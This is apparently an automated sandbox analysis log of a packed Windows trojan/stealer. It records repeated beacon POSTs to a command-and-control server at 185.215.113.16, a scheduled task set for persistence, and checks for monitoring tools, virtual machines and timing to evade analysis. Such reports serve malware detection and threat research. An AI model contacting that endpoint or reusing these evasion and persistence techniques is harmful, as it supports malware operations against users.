                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008ABD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,8_2_008ABD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/-dt
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php

                    System Summary

                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008A4CF08_2_008A4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008AE4408_2_008AE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E30688_2_008E3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008D7D838_2_008D7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_009896808_2_00989680
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008A4AF08_2_008A4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E765B8_2_008E765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E2BD08_2_008E2BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E6F098_2_008E6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E87208_2_008E8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E777B8_2_008E777B
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.997253916893733
                    Source: file.exeStatic PE information: Section: xtqiedmi ZLIB complexity 0.9943757178407351
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.997253916893733
                    Source: axplong.exe.0.drStatic PE information: Section: xtqiedmi ZLIB complexity 0.9943757178407351
                    Source: axplong.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                    Source: file.exe Static file information: File size 1874944 > 1048576
                    Source: file.exe Static PE information: Raw size of xtqiedmi is bigger than: 0x100000 < 0x198200

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 8.2.axplong.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.dr Static PE information: real checksum: 0x1cc7d5 should be: 0x1d0ac8
                    Source: file.exe Static PE information: real checksum: 0x1cc7d5 should be: 0x1d0ac8
                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: .idata
                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: xtqiedmi
                    Source: file.exe Static PE information: section name: pzupkaig
                    Source: file.exe Static PE information: section name: .taggant
                    Source: axplong.exe.0.dr Static PE information: section name:
                    Source: axplong.exe.0.dr Static PE information: section name: .idata
                    Source: axplong.exe.0.dr Static PE information: section name:
                    Source: axplong.exe.0.dr Static PE information: section name: xtqiedmi
                    Source: axplong.exe.0.dr Static PE information: section name: pzupkaig
                    Source: axplong.exe.0.dr Static PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_008BD84C push ecx; ret 8_2_008BD85F
                    Source: file.exe Static PE information: section name: entropy: 7.98054945395771
                    Source: file.exe Static PE information: section name: xtqiedmi entropy: 7.9531674604718186
                    Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.98054945395771
                    Source: axplong.exe.0.dr Static PE information: section name: xtqiedmi entropy: 7.9531674604718186
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879226 second address: 87922C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87922C second address: 879231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879231 second address: 87923D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F43A4FCF696h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87923D second address: 87924B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F43A4BB4C26h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8793E6 second address: 8793EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879596 second address: 8795B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C37h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8799A8 second address: 8799AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879AF2 second address: 879AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879AF6 second address: 879AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A96C second address: 87A970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
